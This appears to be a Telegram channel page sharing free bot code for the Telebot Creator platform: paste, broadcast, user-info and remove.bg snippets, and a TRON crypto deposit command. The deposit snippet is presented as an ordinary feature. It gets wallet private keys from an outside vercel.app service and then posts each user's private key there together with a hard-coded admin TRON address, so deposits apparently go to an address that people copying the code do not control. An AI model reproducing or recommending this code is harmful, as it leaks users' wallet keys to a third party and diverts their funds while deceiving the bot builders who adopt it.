en
Feedback
π˜’π˜¦π˜·π˜ͺ𝘯 x π˜‰π˜°π˜΅π˜΄β„’

π˜’π˜¦π˜·π˜ͺ𝘯 x π˜‰π˜°π˜΅π˜΄β„’

Open in Telegram

πŸ“£ This Channel Provides Free Bots & Codes For Telebot Creator Platform

Show more
217
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
🧩 @TBCManualReferBot πŸ“¨ Send Your Tbc mail in comments if you want! your referral will get bonus after joining the channels

πŸ’Ÿ Drop Your Tbc Mail In Comments For This Bot !

Want This Bot @TBCPollBot ?
Anonymous voting

πŸŽ‰ If you want this bot! πŸ“© Send Your Tbc Mail For This Bot

@Task_CreatorBot Everyone try this bot and tell if any error in comments

πŸŽƒ Comment Which Bot/Code You Want I Will Make If Possible πŸŽƒ

πŸ–‡οΈ Paste To Nekobin.com πŸ’Ž COMMAND: PASTE bot.replyText(u, "<b>Send Text To Paste at nekobin.com</b>",disable_web_page_preview=True) Bot.handleNextCommand("/paste") πŸ’Ž COMMAND: /paste content = message.text #https://t.me/KevinBots response = HTTP.post("https://nekobin.com/api/documents",headers={"Content-Type": "application/json"},json={"content": content}).json() bot.replyText(u, "https://nekobin.com/"+response["result"]["key"])

πŸ”» TRON DEPOSIT CODE BY @CODER_KEVIN πŸ”» πŸ” Command: πŸ’° Deposit Bot.runCommand("/deposit") πŸ” Command: /deposit button = InlineKeyboardMarkup() button.add(InlineKeyboardButton(text="πŸ”ƒ Refresh Deposit",callback_data="/deposit r")) channel = "@KEVINBOTS" wallet = Bot.getData("wallet"+str(u)) if wallet == None: bot.replyText(u, "βœ‹οΈ <b>Hold on..... generating your Deposit address...</b>") data = bunchify(HTTP.get("https://verceltron.vercel.app").json()) res = data.address.base58 priv = data.privateKey Bot.saveData("wallet"+str(u),res) Bot.saveData("private"+str(u),priv) bot.replyText(u, f"⚠️ <b><i>If you send less than 0.1 TRX, your deposit will be ignored!</i>\n\nβœ… Send the amount you want to deposit to the following address:</b>\n\n<code>{res}</code>",reply_markup=button) elif params == "r": key = Bot.getData("private"+str(u)) address = "TNKUr7eHfaXR6j1i6q4ZdVdR2TLDkkaABx" result = bunchify(HTTP.post("https://verceltron.vercel.app/easytrx", json={"private_key": key,"Admin_tron_address": address}).json()) amount = result.Amount if amount == None: bot.replyText(u, "<b>πŸ™ Your Deposit not found</b>") elif amount >= 0.1 and amount <= 50000000: txid = result.response.transaction.txID bot.replyText(u,f"<b>Deposit confirmed\n\nAmount:</b> {amount} TRX \n\nTxid: https://tronscan.org/#/transaction/{txid}",disable_web_page_preview=True) bot.replyText(chat_id=channel,text=f"<i>πŸ₯³ New Deposit Recieved by</i> <b>{message.from_user.first_name}</b>\n\nπŸ’΅ Amount : {format(amount,'.2f')} <b>TRX</b>\n\n<b>β›“ Transaction ID:</b>\n<i>https://tronscan.org/#/transaction/{txid}\n\n🀩 Grow Your Social Platforms From Here</i> ➑️ @{Bot.info().username}",disable_web_page_preview=True) else: bot.replyText(u, f"⚠️ <b><i>If you send less than 0.1 TRX, your deposit will be ignored!</i>\n\nβœ… Send the amount you want to deposit to the following address:</b>\n\n<code>{wallet}</code>",reply_markup=button)

πŸ”– Broadcast With Forward Tag #TPY by @Coder_Kevin πŸ”° Command: πŸ“’ Broadcast bot.replyText(u,"πŸ” <b>Forward Your Message To Broadcast</b>") Bot.handleNextCommand("/onBroadcast") πŸ”° Command: /onBroadcast admin = 5677958229 if admin != u: bot.sendMessage(chat_id=u,text="❌ Command not found") else: code = f"""bot.forwardMessage(chat_id=u,from_chat_id='''{message.chat.id}''',message_id='''{message.message_id}''')""" task = Bot.broadcast(code = code) bot.sendMessage("<b>πŸ“£ Broadcast Sent...</b>") Bot.saveData(task,None)

πŸͺͺ User Info tpy code by @coder_kevin user = message.from_user msg = f"<b>User info</b>:\n<b>ID</b>: <code>{user.id}</code>\n<b>First Name</b>: {user.first_name}\n<b>Username</b>: @{user.username}\n<b>Language Code</b>: {user.language_code}" bot.sendMessage(chat_id=u,text=msg,parse_mode="html")

πŸ’– Remove.bg tpy code by @coder_kevin image_url = "https://te.legra.ph/file/70e9c0d1c4e8a220dcffe.jpg" # image url api_key = "your_api_key" # your remove.bg api key response = HTTP.post('https://api.remove.bg/v1.0/removebg',data={'image_url': image_url,'size': 'auto'},headers={'X-Api-Key': api_key}) try: bot.sendPhoto(photo=response.content) except: bot.sendMessage(bunchify(response.json()).errors[0].title)

πŸ’¬ Comment Which Code You Want ! #telebotcreator #tpy

🌐 What is Telebot Creator? Telebot Creator is a Platform where you can Create your own bot for Telegram. πŸ”§ How to create Bot on Telebot Creator? 1️⃣ Step 1: Sign up and log in to your telebotcreator.com account. 2️⃣ Step 2: Create bot with @BotFather 3️⃣ Step 3: Now create bot in app then fill your bot token 4️⃣ Step 4: Done! Tap on Create Bot your bot will be created 5️⃣ Step 5: Make commands and run Bot. πŸ“’ Channel: @KevinBots πŸ’¬ Support Chat: @telebotcreatorchat πŸ”§ Help: help.telebotcreator.com